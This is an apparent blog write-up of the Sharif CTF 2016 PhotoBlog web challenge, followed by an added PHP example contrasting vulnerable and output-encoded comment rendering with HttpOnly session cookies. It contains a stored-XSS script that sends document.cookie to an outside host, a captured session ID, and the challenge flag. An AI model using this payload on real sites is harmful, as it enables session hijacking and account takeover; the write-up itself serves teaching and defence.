
Sunday, 7 February 2016

Sharif CTF 2016: PhotoBlog (Web) Write-up


Description:
A friend of mine has stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea? The Blog
Solution:

1. Accessing the blog, I found input fields (user, comment, captcha); the user and comment fields are vulnerable to cross-site scripting (XSS).


2. The description says "want to login as admin", so I wrote custom JavaScript to steal the admin's cookie and put it in a comment.
<script>new Image().src = 'http://www.my.site/icheernoom.php?cookies=' +  encodeURI(document.cookie);</script>

3. After waiting a minute, a cookie showed up in my site's access log.
/icheernoom.php?cookies=PHPSESSID=515386866780b5f132fc96c02b3ddb82

4. "Login as admin": I guessed the admin page is /admin.php; it exists and redirects to /login.php. I tried accessing it with the admin's cookie.


Flag: 1b7a60600d5731739c0e2115bd4ebf7c
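
The steps above work because the comment fields are written into the page without encoding and because PHPSESSID can be read from document.cookie. The following is an added example showing both fixes; it is not the challenge's source code or part of the original write-up. The function names, the sample comment and the collector.example host are constructed for illustration, and it assumes PHP 7.3+ and a site served over HTTPS.

```php
<?php
// Added example: hypothetical comment-rendering code, not the challenge's source.

// Constructed sample of a stored comment that reads document.cookie.
// collector.example is a placeholder host.
$comment = [
    'user'    => 'visitor',
    'comment' => "<script>new Image().src='//collector.example/?c='"
               . "+encodeURI(document.cookie);</script>",
];

// Vulnerable: stored fields are echoed into the page as raw HTML,
// so the script runs in the browser of whoever views the comment.
function render_comment_vulnerable(array $c): string
{
    return "<div class=\"comment\"><b>{$c['user']}</b>: {$c['comment']}</div>";
}

// Hardened: encode every stored field for the HTML context at output time.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_comment_safe(array $c): string
{
    return '<div class="comment"><b>' . e($c['user']) . '</b>: '
         . e($c['comment']) . '</div>';
}

// Defence in depth: keep the session cookie out of reach of page scripts.
// Must run before session_start() and before any output is sent.
function harden_session_cookie(): void
{
    session_set_cookie_params([
        'path'     => '/',
        'secure'   => true,      // assumption: HTTPS only
        'httponly' => true,      // hides PHPSESSID from document.cookie
        'samesite' => 'Strict',
    ]);
}

harden_session_cookie();
echo "vulnerable: ", render_comment_vulnerable($comment), PHP_EOL;
echo "hardened:   ", render_comment_safe($comment), PHP_EOL;
echo "cookie:     ", json_encode(session_get_cookie_params()), PHP_EOL;
```

HttpOnly only stops the cookie from being read by script; the output encoding is what removes the XSS itself.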
